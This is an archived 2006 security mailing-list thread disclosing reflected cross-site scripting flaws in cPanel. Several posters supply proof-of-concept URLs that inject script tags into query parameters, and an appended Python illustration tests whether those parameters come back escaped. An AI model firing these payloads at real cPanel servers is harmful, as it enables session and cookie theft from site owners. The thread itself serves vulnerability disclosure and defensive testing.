 
Date: Fri Feb  3 06:48:37 2006
From: sumit.siddharth at gmail.com (Sumit Siddharth)
Subject: Re: cPanel Multiple Cross Site Scripting Vulnerability

An addition to your POC :)
http://localhost:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change
Thanks
Sumit

On 2/3/06, Sullo <csullo@...il.com> wrote:
> On 3/13/2004 I notified cPanel that they had major XSS issues in their
> backend... beyond what I was actually sending them or documenting, and they
> should fix them. They agreed.
>
> However, based on this, it doesn't look like they've done much in the two
> years since I posted:
>    http://www.cirt.net/advisories/cpanel_xss.shtml
>
>
> On 2/2/06, simo@...x.org <simo@...x.org> wrote:
> >
> > Title: cPanel Multiple Cross Site Scripting
> > Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
> > Affected scripts with proof of concept exploit:
> >
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
> > <script>alert('vul')</script>&domain=
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
> > <script>alert('vul')</script>&domain=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
> > "><script>alert('vul')</script>
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=
> > "><script>alert('vul')</script>
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx
> > "><script>alert('vul')</script>&target=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006
> > "><script>alert('vul')</script>&domain=xxx&target=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
> > "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
> >
>
> --
>
> http://www.cirt.net     |      http://www.osvdb.org/
>
>


--

Sumit Siddharth
Information Security Analyst
NII Consulting
Web: www.nii.co.in
------------------------------------
NII Security Advisories
http://www.nii.co.in/resources/advisories.html
------------------------------------
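Every proof-of-concept URL in this thread works the same way: a query parameter is echoed into the page's HTML without escaping, and where the parameter lands inside an attribute the payload first closes that attribute with `">`. The Python below is an added illustration, not code from cPanel, from the advisory, or from any poster. It pulls the injected parameter out of each posted URL, renders the parameters through a hypothetical CGI template both raw and HTML-escaped (the `render_unsafe`/`render_safe` templates and the `audit` helper are assumptions for the demonstration, not cPanel's actual page code), and classifies how each payload comes back.

```python
import html
from urllib.parse import parse_qsl, urlsplit

# The PoC URLs as posted in the thread (the advisory's placeholder host kept as-is;
# the lines the archive wrapped are rejoined into single URLs).
POC_URLS = [
    "http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html"
    "?email=<script>alert('vul')</script>&domain=",
    "http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html"
    "?showtree=0\"><script>alert('vul')</script>",
    "http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html"
    "?mon=Jan\"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx",
    "http://localhost:2095/webmailaging.cgi"
    "?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change",
]


def tainted_params(url):
    """Return the query parameters whose percent-decoded value carries a script tag."""
    query = urlsplit(url).query
    return {k: v for k, v in parse_qsl(query, keep_blank_values=True)
            if "<script" in v.lower()}


def render_unsafe(script, params):
    """Hypothetical CGI page that interpolates query values into markup unescaped.

    This is the pattern the PoCs rely on; a value like 0"><script>...</script>
    closes the value="..." attribute and the script runs in the page origin.
    """
    fields = "".join(f'<input name="{k}" value="{v}">' for k, v in params.items())
    return f'<html><body><form action="{script}">{fields}</form></body></html>'


def render_safe(script, params):
    """Same page with every reflected name and value HTML-escaped (quotes included)."""
    fields = "".join(
        f'<input name="{html.escape(k, quote=True)}" value="{html.escape(v, quote=True)}">'
        for k, v in params.items()
    )
    return f'<html><body><form action="{html.escape(script, quote=True)}">{fields}</form></body></html>'


def classify_reflection(body, value):
    """'raw' if the value is echoed verbatim, 'escaped' if only its HTML-escaped
    form appears, 'absent' if it is not reflected at all."""
    if value in body:
        return "raw"
    if html.escape(value, quote=True) in body:
        return "escaped"
    return "absent"


def audit(url, renderer):
    """Render a PoC URL through the given template and classify each injected parameter."""
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    body = renderer(parts.path, params)
    return {k: classify_reflection(body, v) for k, v in tainted_params(url).items()}


if __name__ == "__main__":
    for url in POC_URLS:
        path = urlsplit(url).path
        print(f"{path}: unsafe={audit(url, render_unsafe)} safe={audit(url, render_safe)}")
```

Against a live target the same `classify_reflection` check can be run on the real response body: a `raw` result for the injected parameter is the reflected XSS the advisory describes, while `escaped` means the page now encodes that parameter. Escaping on output fixes the attribute case only when quotes are encoded as well, which is why `html.escape(..., quote=True)` is used rather than the default.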
